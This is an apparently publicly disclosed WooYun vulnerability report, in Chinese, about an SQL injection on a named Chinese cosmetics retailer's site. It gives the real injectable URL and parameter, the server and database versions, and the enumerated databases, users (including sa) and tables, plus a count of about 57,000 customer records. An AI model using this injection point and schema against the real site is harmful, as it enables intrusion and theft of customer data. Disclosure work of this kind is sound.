漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-058940
漏洞标题:家隆名妆主站SQL注入
相关厂商:家隆名妆
漏洞作者: 手榴弹
提交时间:2014-04-30 15:09
修复时间:2014-06-14 15:10
公开时间:2014-06-14 15:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
家隆名妆主站SQL注入
详细说明:
注入点:http://www.jlmz.com.cn/detail/GoodDetail.aspx?goods_ID=34142&actPrice=aib.oo
报错注入
系统: Windows 2003
WEB服务: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
数据库类型: Microsoft SQL Server 2005
数据库:
AnalysisWebLog
bp_mng
Calon
co_mng
DataBak
DataNew
eDRP
eFile
eLB
hnmry
jl_shop
jlDev
jlmz_DB
jlmzserves
jlserves
master
model
msdb
ReportServer
ReportServerTempDB
S3MEI
tempdb
yoyoNew
用户名:
jlmzdb
sa
漏洞证明:
表名:
CLmenus
CLpurgppur
CLpurgppur
CLpurviews
CLuserMenus
CLuserspurgp
CLuserspurgp
CLuserspurgp
TB_Test_ANSWER_Detail
TB_Test_Answer_User_detail
TB_Test_Answer_User_detail
TB_Test_OPTIONS
TB_Test_QUESTION
TB_Test_RELEASE
TB_Test_SURVEY
TB_Test_StyleTemplate
Tb_Test_Member_config
Tb_Test_Member_config
ViewActBuyMore
ViewActGoodsDetailsGoWhere
ViewActGoodsDetailsGoWhere
ViewActGoodsDetailsOnAmount
ViewAlcByRoleId
ViewAlcByRoleId
ViewMenuByRoleId
ViewMenuByRoleId
ViewMenuByUserNo
ViewOrderHadAndUsers
ViewPermissions
ViewRoleAlc
ViewRoleAlc
ViewRoleMenuByCondition
ViewRoleMenuByCondition
ViewRoleUser
ViewSpecialGoods
ViewUser
ViewWareStandGroup
View_ActBuyMoreByAct_ID
View_ActivitesAndGoods1
View_GoodsCommentList
View_GoodsCommentList
View_GoodsCommentList
View_OrderBackApply
View_OrderHad
View_UserAndOrderHad
View_rbac_user
WantOnWeb
WareStandardGroupWare
tb_PT_DeductPoint(??)
rbac_tb_alc
rbac_tb_menu
rbac_tb_role_alc
rbac_tb_role_alc
rbac_tb_role_menu
rbac_tb_role_secuser
rbac_tb_secuser
shops
sysParas
sysdiagrams
tb_BG_OrderHad
tb_BG_OrderListDta
tb_BG_OrderUntionListDta
tb_GS_Comment
tb_GS_Goods_BAK20111205
tb_GS_Goods_BAK20111205
tb_GS_Goods_UnionDetial_TimeHistory
tb_GS_PackingInfo
tb_GS_ViewRecord
tb_GT_Brand
tb_GT_GoodsType
tb_GT_Series
tb_Goods_GoodType
tb_Gs_GoodsGroup
tb_Gs_Goods_Union_Detail
tb_PT_GainPoint_History
tb_PT_GainPoint_History
tb_PT_PointDateScope
tb_PT_pointshop
tb_Sys_BackServiceCheckReport
tb_Sys_Config
tb_Sys_Coupon
tb_Sys_LoginLog
tb_Sys_PeriodicalsMail
tb_Sys_Sequence
tb_Sys_mailTemplate
tb_UP_Grade
tb_UP_MessageAnswer
tb_UP_MessageAnswer
tb_UP_MyFavorites
tb_UP_Note
tb_UP_UserAddresses
tb_UP_UserCoupon
tb_UP_UserFriends
tb_UP_UserGiftCard
tb_UP_Users
tb_WB_AdvImg
tb_WB_Class
tb_WB_CommentGrade
tb_WB_MagazineDta_History
tb_WB_MagazineDta_History
tb_WB_MagazineDta_History
tb_WB_News_Articles
tb_WB_Position
tb_WB_Type
tb_hd_ActivityGood_dta_dta
tb_hd_ActivityGood_dta_dta
tb_hd_PpecialGoodsDta
tb_hd_activities_good1
tb_hd_activities_good1
tb_hd_activities_good2
tb_hd_activityScoreDetail
tb_hd_logisticsCharge
tb_pt_UserInformationScore
tb_public_Web_Article
tb_public_Web_ArticleType
tb_public_Web_CustImage
tb_public_Web_Keyword
tb_public_Web_Menu
tb_public_seo_key
tb_public_web_dictionary
tb_seo_Key
tb_sys_MenuConfig
tb_sys_bank
tb_sys_logistics
tb_sys_searchKeyWords
tb_up_OrderBackApplyDta
tb_up_OrderBackApplyDta
tb_up_OrderCashRecord
tb_up_ShoppingCart
tb_up_UserInformationScore
tb_up_UserIntroGoods
tb_up_UserInviteFriend
tb_wb_UserBrowseGood
view_GetListOnYouSearch
view_UserInfoMationScore_Users
view_salesReport
用户量
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| dbo.tb_UP_Users | 57495 |
+-----------------+---------+
修复方案:
过滤
版权声明:转载请注明来源 手榴弹@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝